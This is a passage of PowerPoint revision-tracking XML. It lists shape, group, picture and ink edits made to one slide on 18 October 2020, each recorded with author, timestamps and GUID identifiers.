          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:spMk id="2" creationId="{44C044C5-F24C-4441-8062-1C8E5B4C3490}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:24:54.393" v="11080" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:spMk id="309" creationId="{AD0A407E-F448-44DF-B453-BFE32D475BBD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:25:43.129" v="11130" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:spMk id="310" creationId="{8B54F97C-EE40-40B0-B3A8-8934181D2E2A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:35:35.003" v="11356" actId="571"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:spMk id="316" creationId="{CA4D1347-F5C0-413D-9EC2-534FAB40DBB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:11:26.970" v="10539" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="7" creationId="{10317626-ACB0-42B4-9E40-558604E0D3B2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:11:26.326" v="10538" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="10" creationId="{77F827EE-441E-4878-9806-3026D97DF75A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:09:46.899" v="10521" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="13" creationId="{D5F18AC3-B4E1-4125-8312-6E952D7E81C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0" creationId="{EF64F64A-5E99-43C7-B8A1-BA30BB57096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3" creationId="{1C668393-7613-492B-A71F-9F3927ECBFA5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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7" creationId="{61F68150-DFD2-429D-A998-2164C72A1EC6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:11:44.653" v="10545"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="40" creationId="{34EDC43E-03C2-45E2-BABB-4AE20EABD876}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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3" creationId="{C88E368B-AE80-4663-A5B2-129D2E9B0C5A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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8" creationId="{14384165-C66F-43C9-B6E9-A19F418C1787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51" creationId="{6F9E3F6A-34E3-4932-B04B-993A8E2B6ECC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2" creationId="{C371B7EB-E82F-41B4-A9DA-A14E2194C23E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3" creationId="{EEC6A621-6B14-49D2-B835-C9B01C17172A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:13:39.936" v="10583"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="68" creationId="{A446791C-8741-4C0B-A284-0EF5B22B20B7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1" creationId="{15E0478F-A04B-4A59-A877-6F7CFC45715A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8" creationId="{DD13784B-9043-4A0E-912A-18C3587346AD}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:18.768" v="10638"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="94" creationId="{670479D5-A939-4FC6-8A4C-022D1C888E34}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:11.224" v="10620"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="112" creationId="{93DED0DE-6756-4633-8D3A-BF9015D9A80C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:10.959" v="10618"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="114" creationId="{509D2ABE-2A38-4364-A526-6938E16DAC8F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:19.868" v="10640"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="117" creationId="{4FE02573-0606-4F9B-B218-BD1AC1D95A64}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:26.329" v="10650"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="119" creationId="{8EF09CFD-A8A2-4F58-998C-5323DDD62F50}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:29.221" v="10655"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="129" creationId="{F69FC996-8A72-44AA-997F-C030FB91172C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:30.919" v="10657"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="134" creationId="{57361B87-71DA-4ABC-9035-6490A30DFC2C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136" creationId="{30DF316A-2945-43F9-BAD5-42E8AB79C906}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del 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40" creationId="{2D0B6B62-4A0E-432F-BD86-92252BCEAC1A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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43" creationId="{81D529BB-6081-43BD-9169-125347514585}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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51" creationId="{9E61EAB1-DD10-40F7-9148-8927D7DA6A48}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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53" creationId="{68E67C8E-5B34-425B-ABA9-9115FDF32CE0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:16:31.028" v="10685"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="157" creationId="{F3CEAB90-8A1F-43A1-ABDD-F637CC8DFF99}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:16:40.124" v="10690"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="162" creationId="{07F12AF6-114C-4289-B67F-F71226393E25}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:17:09.277" v="10710"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="178" creationId="{88526B7E-7542-44BE-BD7D-11B2993EEFEE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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2" creationId="{5EFE9296-E4F0-483D-A59E-89157EEE3724}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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4" creationId="{8DEF9086-9456-4388-878C-0330E3D87475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199" creationId="{CE344199-230A-434B-A445-AAE0B6D42BEC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:21:19.075" v="10886" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="200" creationId="{505BBFFC-AE9B-4D7C-8449-27D21DA07941}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.218" v="10760"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="217" creationId="{11044EC5-3F2D-458D-B871-8AFC00A9B8D9}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:47.034" v="10753"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="224" creationId="{781134A8-11CD-41B0-8A1D-BEF52F928591}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:01.429" v="10780"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="229" creationId="{D7E66457-8EBB-46AC-B4F7-14B60C5CCAE7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:08.833" v="10789"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="235" creationId="{F8B2FF7C-0B75-4DE9-BE0C-E9FAB085641F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:12.282" v="10796"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="238" creationId="{5F541006-44A8-499E-918F-82A64045D3D7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:21.728" v="10802"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="245" creationId="{39B4A418-800C-442F-AF17-5687C83ADE8C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:18.692" v="10800"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="247" creationId="{B65996E4-EFBB-422A-BFE0-DEB1AE80A1E4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49" creationId="{A3511473-37B1-4E30-8A35-21EAEB44B30A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:33.554" v="10811"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="256" creationId="{FF461345-BD8E-48CD-827A-FEF51A8AB68B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:38.831" v="10815"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="258" creationId="{072786E1-F0E9-4BBE-905F-8E4ADA2E5176}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:45.343" v="10824"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="260" creationId="{D2E0C4CF-2054-49CE-80D6-02BDF0B1C2A1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:05.819" v="10839" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="267" creationId="{A8326FA5-2D69-48B6-9401-C11E3E2B6F8B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:14.026" v="10846"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="271" creationId="{478203B9-E1D7-4783-AC7F-A3E2279E9434}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:19.042" v="10854"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="274" creationId="{A2CD88A1-D158-4E90-940C-B3578FF39E49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82" creationId="{6BB11AD6-E9E4-4596-9F56-8B5B80FC266B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:40.650" v="10879"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="287" creationId="{CDD062FF-D4A1-4367-AA9E-1D2618EE85D6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:45.034" v="10881"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="289" creationId="{6FF094F0-215E-47AF-AAE7-05AEF028C837}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:21:31.738" v="10897"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="298" creationId="{08E25F5C-3F61-4DD7-B278-79D86984663C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307" creationId="{A91D0F48-9129-420E-8528-DCD0C39F6436}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:35:35.003" v="11356" actId="571"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:grpSpMk id="312" creationId="{29CB3CF9-AEC8-4442-825C-C331CF3F1AD6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T11:03:16.228" v="11632" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:picMk id="3" creationId="{4BCEAC6A-6C7E-4BFA-A441-CAA204152D2D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:35:35.003" v="11356" actId="571"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:picMk id="311" creationId="{C37C2FE9-55EE-4288-9D84-E36FD3594F5A}"/>
          </ac:picMkLst>
        </pc:pic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4" creationId="{3B89FD79-90A9-4235-B21D-8491F2630E96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5" creationId="{1B636ABB-1DFE-4980-BF2E-FEE71FC506AD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6" creationId="{0D3D11A7-E330-4CD5-85CF-997F61C7D476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8" creationId="{C1E9E5B0-81FD-4E84-879B-30AD3E61337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9" creationId="{0F9ECCA2-3E35-4A0B-AD1B-D54E26B0ECED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1" creationId="{C8F4F47D-8A6E-45F5-B16E-ECC0340147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2" creationId="{96E2172A-F3F6-4475-8A52-A1EDE30AB5C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4" creationId="{842EFE7E-C3AF-4F9A-A688-36044FD3837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5" creationId="{85C82423-AE8B-4DE5-A52C-D4591A292C8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6" creationId="{F456ADA0-1864-458F-82B0-62E5AE0C7179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7" creationId="{278D909E-E3EC-4BDA-AD65-79A594AC6EB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8" creationId="{F204962C-6608-47B5-B4FA-2C09CCA8F0B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9" creationId="{BFCCAF66-E7C8-44E8-A20F-AB902F6E137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0" creationId="{993115E1-80C6-4852-A82F-DB22FB3EC3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1" creationId="{4D0832F5-7492-46D4-A35A-18787D00909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2" creationId="{271A7AE8-B43C-4DF5-BF22-AD0C5C258D53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3" creationId="{FB4980B9-8300-432C-B187-6A3BE409B86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4" creationId="{9B77C134-501A-4F64-9396-C664982FEE2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5" creationId="{31A00EAD-AA74-4517-90D5-5E6AB2F6CBC2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6" creationId="{04B6D3A6-3CEB-463F-B784-C0E17FBB83A7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7" creationId="{C2A9EF62-461D-4222-A970-DECE96BD041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8" creationId="{E13C50D5-0674-453A-B04F-8A71CBCC6868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9" creationId="{BBBEFEE8-C083-43E7-BFD2-7BDE514E5A9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1" creationId="{2EA720F7-6588-48F7-AB96-33320DE868FA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2" creationId="{15AE1CB6-A504-45B2-8EBF-E8B46FFB77AD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4" creationId="{68B26E2A-230F-4A69-BEBB-3A0E373E76EF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5" creationId="{AF5037AE-DEB2-4FA4-9C45-BD983C419FB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6" creationId="{C471BEE0-24FE-4729-A3E0-B48F8C1A4A6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8" creationId="{1B7E7553-6352-4FB5-9196-3A65BAF8AA1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9" creationId="{04893545-5F3F-4BFB-93AA-1644A2BFF743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1" creationId="{4774137C-8DD3-4BDA-A5BC-CFE422CD76F1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2" creationId="{2C09B1D7-BD5F-4972-B13B-BA590DB99082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4" creationId="{140660D0-F1FD-4803-934B-CE5E70BFC39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5" creationId="{A9702536-9F93-461C-BCCC-B322C7C823AA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6" creationId="{1101E82A-FDA8-45C1-A083-3827F7258D7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7" creationId="{DFCE599D-212D-4E0D-97D8-6B7A8E243BD6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49" creationId="{6F32E9BC-44E9-4918-B815-7C8943D7AC8C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50" creationId="{9109BA7A-7553-4FB6-84BB-B78DCE3D5B1A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2" creationId="{C76FA8D6-942E-4671-848F-4A5D0C618235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3" creationId="{57DD3DBA-B179-4FC6-9403-68AE305E541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4" creationId="{046654FB-2598-4542-BB62-AA4F06515ABB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5" creationId="{DA499653-FC02-4F7E-A213-5BC0AC66335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6" creationId="{F9D30F6E-345E-4DB6-ABF8-FEFB6972F5A6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7" creationId="{5D0BD1C6-A4F9-41DC-B4D3-C507A2525E14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8" creationId="{5391F346-0810-4FCC-BD08-50EFF3FB3B51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9" creationId="{B9E7C279-776C-4D76-9968-4F70E6B55158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0" creationId="{B4F00A78-E803-43C9-B009-DEF444433A0D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1" creationId="{3EF23484-F72C-4005-A018-EA4A90E12D67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4" creationId="{54EFC324-07C0-4154-AB81-1DA1DD2F147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5" creationId="{9D82206C-9CC1-43DE-85C7-5E182B993EDD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6" creationId="{ADBD0ED0-3011-4F53-9106-9E6BB9840AC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7" creationId="{5F700AEA-8086-498A-8F4C-7EC632E3E5D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9" creationId="{28EA2AB5-3E40-44DE-9F82-6673F77F8A99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0" creationId="{AE62AE84-99D5-47D0-A98B-EBC65787A8AA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1" creationId="{49821D3C-7913-41B3-B4FB-B8DE28A5524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2" creationId="{DDA7943A-9A14-452F-A634-638724A9B6E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3" creationId="{B319A624-D687-4473-A6AC-7EB8D869E082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4" creationId="{27F98E54-A633-4CD8-880C-4FE86BB34A6B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5" creationId="{1089C929-83F0-4E26-8C5D-0A4B615A2FF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6" creationId="{9239AF37-9248-44FF-9748-BFAA873F4E24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7" creationId="{090505E0-178F-4679-BBC9-256F70B33ED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8" creationId="{2EEF8914-6BB7-4426-8AEC-CB8BAF1A7E81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9" creationId="{F650C465-6754-4311-91DE-C2D19C2EAF3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80" creationId="{B995EA15-1EBF-4B87-A652-7CEA9759EDA1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2" creationId="{50219963-C737-43A4-89BD-7F1B1B39F109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3" creationId="{5A9D083F-3448-4722-9A3A-E9D0990CC4A0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4" creationId="{8303133E-996F-4D8E-924B-C4F105E0013D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5" creationId="{0524E01B-0ED6-43B6-9D83-6B51A9149A5F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6" creationId="{D65ACF62-AF15-4D81-91F1-C0EF186559EB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7" creationId="{E5961D41-3BE6-47F9-A68E-47108110B3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89" creationId="{4FF2CE41-2909-4753-B78D-6EB28A10F3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0" creationId="{F86F027B-E284-4DD1-836A-4E02761FD793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1" creationId="{836BD693-415D-499D-A450-2B6FD591F54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2" creationId="{54C43965-1A95-4711-ACED-A310EF1D9EA4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3" creationId="{CEF4A1D8-639E-4FC4-816C-B25A13D9B3FE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5" creationId="{B56D6361-14AD-4BD0-B834-6D063E87B02F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:14.362" v="10635" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="96" creationId="{C347E9AE-1354-4D1B-87D2-A682D70A8E9A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:13.969" v="10634" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="97" creationId="{CBAADC73-10A7-4C8A-BA7D-D81EEE9DC7B1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:13.577" v="10633" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="98" creationId="{A075FB1B-E5A2-4EE0-A1D7-FBD1640A3346}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:13.409" v="10632" actId="9405"/>
